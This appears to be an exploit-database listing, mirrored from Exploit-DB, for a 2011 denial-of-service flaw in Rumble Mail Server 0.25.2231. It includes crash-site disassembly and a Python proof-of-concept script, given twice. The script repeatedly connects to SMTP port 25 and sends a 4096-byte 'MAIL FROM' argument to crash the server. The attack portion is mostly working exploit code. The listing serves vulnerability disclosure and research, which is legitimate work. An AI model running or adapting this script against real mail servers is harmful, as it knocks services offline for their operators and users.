header-logo
Suggest Exploit
vendor:
Rumble
by:
AutoSec Tools
N/A
CVSS
N/A
Denial Of Service
None
CWE
Product Name: Rumble
Affected Version From: 0.25.2231
Affected Version To: 0.25.2231
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011

Rumble 0.25.2232 Denial Of Service

A denial of service vulnerability can be exploited to crash Rumble Mail Server v0.25.2231. rumble_win32.exe: The instruction at 0x96CEEB referenced memory at 0x41414149. The memory could not be read (0x0096CEEB -> 41414149). Disassembly: .text:0096CEEB mov edx, [ecx+8] .text:0096CEEE mov [ebp-8], edx .text:0096CEF1 mov eax, [ebp-8] .text:0096CEF4 mov ecx, [eax] .text:0096CEF6 mov [ebp-0Ch], ecx .text:0096CEF9 mov edx, [ebp+0Ch] .text:0096CEFC mov [ebp-10h], edx .text:0096CEFF .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31 .text:0096CEFF mov eax, [ebp-10h] .text:0096CF02 mov cl, [eax] .text:0096CF04 mov [ebp-11h], cl .text:0096CF07 mov edx, [ebp-0Ch] .text:0096CF0A cmp cl, [edx] .text:0096CF0C jnz short loc_96CF3C PoC: import socket host = 'localhost' tld = 'mydomain.tld' port = 25 def crash(): for i in range(0, 16): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(32) junk = 'A' * 4096 print s.recv(8192) s.send('HELO ' + tld + '') print s.recv(8192) s.send('MAIL FROM ' + junk + '') print s.recv(8192) s.close() crash()

Mitigation:

None
Source

Exploit-DB raw data:

# ------------------------------------------------------------------------
# Software................Rumble 0.25.2232
# Vulnerability...........Denial Of Service
# Threat Level............Serious (3/5)
# Download................http://humbedooh.users.sourceforge.net/
# Discovery Date..........3/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
# A denial of service vulnerability can be exploited to crash Rumble
# Mail Server v0.25.2231.
# 
# rumble_win32.exe: The instruction at 0x96CEEB referenced memory at
# 0x41414149. The memory could not be read (0x0096CEEB -> 41414149)
# 
# Disassembly:
# 
# .text:0096CEEB mov     edx, [ecx+8]
# .text:0096CEEE mov     [ebp-8], edx
# .text:0096CEF1 mov     eax, [ebp-8]
# .text:0096CEF4 mov     ecx, [eax]
# .text:0096CEF6 mov     [ebp-0Ch], ecx
# .text:0096CEF9 mov     edx, [ebp+0Ch]
# .text:0096CEFC mov     [ebp-10h], edx
# .text:0096CEFF
# .text:0096CEFF loc_96CEFF:                             ; CODE XREF: .text:0096CF31
# .text:0096CEFF mov     eax, [ebp-10h]
# .text:0096CF02 mov     cl, [eax]
# .text:0096CF04 mov     [ebp-11h], cl
# .text:0096CF07 mov     edx, [ebp-0Ch]
# .text:0096CF0A cmp     cl, [edx]
# .text:0096CF0C jnz     short loc_96CF3C
# 
# 
# --PoC--

import socket

host = 'localhost'
tld = 'mydomain.tld'
port = 25

def crash():    
 for i in range(0, 16):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(32)    
  
  junk = 'A' * 4096
  
  print s.recv(8192)
  s.send('HELO ' + tld + '\r\n')
  print s.recv(8192)
  s.send('MAIL FROM ' + junk + '\r\n') 
  print s.recv(8192)
  
  s.close()
 

crash()

Navigation

Suggest Exploit

Services By CQR